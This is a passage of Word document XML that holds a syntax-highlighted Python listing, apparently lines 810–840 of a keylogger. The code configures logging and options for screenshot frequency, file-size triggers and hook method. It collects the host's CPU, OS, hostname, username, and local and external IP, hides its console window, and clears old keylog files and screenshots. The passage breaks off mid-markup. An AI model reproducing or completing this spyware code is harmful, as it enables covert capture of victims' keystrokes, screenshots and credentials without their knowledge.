        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>FileHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>LOG_FILENAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">))  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If set Log to File (-f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1158" w:name="l811"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">811  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1158"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1159" w:name="l812"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">812  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1159"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>basicConfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>set_logging_level</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format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>log_format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>datefmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>log_date_fmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1160" w:name="l813"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">813  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1160"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>log_handlers</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1161" w:name="l814"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">814  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1161"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1162" w:name="l815"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">815  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1162"/>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ommand Line settings: Verbose: {} | Log to File: {} | No Screenshot: {} | Key Min Chars {} | '</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1163" w:name="l816"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">816  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1163"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Screenshot every {} keys | File Size Trigger {} | Hook method {} '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1164" w:name="l817"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">817  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1164"/>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logtofil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n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65" w:name="l818"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">818  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1165"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>args</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>keyst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filesizetrigger</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hookmodule</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1166" w:name="l819"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">819  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1166"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1167" w:name="l820"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">820  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1167"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Init some useful variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1168" w:name="l821"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">821  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1168"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">cpu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rocessor</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1169" w:name="l822"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">822  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1169"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">operating_system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latform</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1170" w:name="l823"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">823  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1170"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname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name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1171" w:name="l824"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">824  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1171"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>getpass</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>getuser</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1172" w:name="l825"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">825  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1172"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">localip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byname</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1173" w:name="l826"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">826  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1173"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">externalip </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>get_external_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1174" w:name="l827"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">827  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1174"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">execname </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argv</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75" w:name="l828"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">828  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1175"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">filerealpath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realpath</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176" w:name="l829"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">829  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1176"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">extension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177" w:name="l830"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">830  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1177"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">driveunit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drive</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78" w:name="l831"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">831  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1178"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1179" w:name="l832"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">832  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1179"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Hide console Window</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1180" w:name="l833"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">833  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1180"/>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hide</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1181" w:name="l834"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">834  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1181"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>hide_console</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1182" w:name="l835"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">835  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1182"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1183" w:name="l836"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">836  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1183"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Delete old keylog files if exists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1184" w:name="l837"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">837  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1184"/>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185" w:name="l838"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">838  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1185"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1186" w:name="l839"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">839  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1186"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Delete old screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1187" w:name="l840"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">840  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1187"/>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de pantalla anterior'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
